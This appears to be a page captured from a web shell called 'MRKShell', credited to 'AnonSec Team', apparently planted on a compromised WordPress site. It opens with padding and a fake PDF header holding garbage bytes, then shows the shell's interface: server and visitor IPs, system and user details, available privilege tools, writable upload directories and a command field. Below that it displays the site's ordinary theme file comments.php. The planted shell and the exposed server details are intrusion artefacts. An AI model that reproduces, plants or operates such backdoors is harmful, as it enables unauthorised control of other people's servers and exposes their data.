...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY MR K IS HERE
MRKShell
Server IP : 65.108.66.160  /  Your IP : 216.73.217.50
Web Server : Apache
System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64
User : alasaweborg ( 1047)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/alasaweborg/public_html/wp-content/themes/greenture/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/alasaweborg/public_html/wp-content/themes/greenture//comments.php
<?php
/**
 * Comments Template
 *
 * This template file used to display comments, pingbacks, trackbacks and comment form.
 *
 * @package greenture
 */

 
if( post_password_required() ) { ?>
	<p class="tpath-no-comments">
		<?php esc_html_e( 'This post is password protected. Enter the password to view comments.', 'greenture' ); ?>
	</p>
	<?php return;	
} ?>
<div id="comments" class="comments-section">
	<?php if ( have_comments() ) {
		$post_id = get_the_ID(); ?>
	
		<div class="comments-title">
			<h6><?php printf( _n( '1 Comment', '%1$s Comments', get_comments_number(), 'greenture' ), number_format_i18n( get_comments_number() ) ); ?></h6>
			
			<?php if ( !is_user_logged_in() ) {
			echo '<p class="comment-login-msg">' . sprintf( wp_kses(__('You are not signed in. <a href="%s">Sign in</a> to post comments.', 'greenture'), greenture_wp_allowed_tags() ), wp_login_url( apply_filters( 'the_permalink', get_permalink( $post_id ) ) ) ) . '</p>';
		} ?>
		</div>
			
		<ul class="tpath-all-comments list-unstyled">
			<?php
				wp_list_comments( array(
					'style'       => 'li',
					'avatar_size' => 100,
					'callback'    => 'greenture_custom_comments'
				) );
			?>
		</ul><!-- .comment-list -->
		
		<?php // Comment pagination.
		 	if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) { ?>
			<div class="navigation comment-nav">
				<ul class="pager comment-pager">
					<li class="previous"><?php previous_comments_link( esc_html__( '&larr; Older Comments', 'greenture' ) ); ?></li>
                	<li class="next"><?php next_comments_link( esc_html__( 'Newer Comments &rarr;', 'greenture' ) ); ?></li>
				</ul>				
			</div><!-- .navigation -->
		<?php } ?>	
		
	<?php } // have_comments()
	else { 
	
		if ( comments_open() ) {
			// Comments are open ?>
			<h6 class="no-comments"><?php esc_html_e( 'No comments yet.', 'greenture' ); ?></h6>
		 <?php } else { 
			// Comments are closed ?>
			<h6 class="no-comments"><?php esc_html_e('Comments are closed.', 'greenture'); ?></h6>
	
		<?php }
		
	} ?>
		
</div><!-- #comments -->
<?php
$commenter = '';
$commenter = wp_get_current_commenter();
$req = get_option( 'require_name_email' );
$aria_req = ( $req ? " aria-required='true'" : '' );
$required_text = '';
$args = array(
  'id_form'           => 'commentform',
  'id_submit'         => 'submit',
  'title_reply'       => esc_html__( 'Comment', 'greenture' ),
  'title_reply_to'    => esc_html__( 'Leave a Reply to %s', 'greenture' ),
  'cancel_reply_link' => esc_html__( 'Cancel Reply', 'greenture' ),
  'fields' => apply_filters( 'comment_form_default_fields', array(
    'author' => '<div class="row comment-input"><div class=" col-lg-4 col-md-6 col-sm-12 col-xs-12 form-group"><input id="author" class="form-control" name="author" type="text" value="' . esc_attr( $commenter['comment_author'] ) . '" placeholder="'. esc_html__('Your Name', 'greenture') . ( $req ? '*' : '' ).'" size="30"' . $aria_req . ' /></div>',
    'email' => '<div class=" col-lg-4 col-md-6 col-sm-12 col-xs-12 form-group"><input id="email" class="form-control" name="email" type="text" value="' . esc_attr( $commenter['comment_author_email'] ) . '" placeholder="'. esc_html__('Email', 'greenture') . ( $req ? '*' : '' ).'" size="30"' . $aria_req . ' /></div>',
	
	'url' => '<div class=" col-lg-4 col-md-6 col-sm-12 col-xs-12 form-group"><input id="url" class="form-control" name="url" type="text" value="' . esc_attr( $commenter['comment_author_url'] ) .
      '" placeholder="'. esc_html__('Website', 'greenture') .'" size="30" /></div></div>'
	  
    )
  ),
  'label_submit'      => esc_html__( 'Add Comment', 'greenture' ),
  'comment_field'	 =>  '<p class="comment-form-comment form-group">' . '<textarea id="comment" class="form-control" name="comment" cols="45" rows="5" placeholder="'. esc_html__( 'Your Message', 'greenture' ) .'" aria-required="true">' . '</textarea></p>',
  'must_log_in' => '<p class="must-log-in">' .
    sprintf(
		wp_kses(__( 'You must be <a href="%s">logged in</a> to post a comment.', 'greenture' ), greenture_wp_allowed_tags() ),
		esc_url( wp_login_url( apply_filters( 'the_permalink', get_permalink() ) ) )
    ) . '</p>',
  'logged_in_as' => '<p class="logged-in-as">' .
    sprintf(
		wp_kses(__( 'Logged in as <a href="%1$s">%2$s</a>. <a href="%3$s" title="%4$s">%5$s</a>', 'greenture' ), greenture_wp_allowed_tags() ),
		esc_url( admin_url( 'profile.php' ) ),
		$user_identity,
		esc_url( wp_logout_url( apply_filters( 'the_permalink', get_permalink( ) ) ) ),
		esc_html__( 'Log out of this account', 'greenture' ),
		esc_html__( 'Log out?', 'greenture' )
    ) . '</p>',
  'comment_notes_after' => '',
  
);
comment_form( $args ); ?>

Anon7 - 2022
AnonSec Team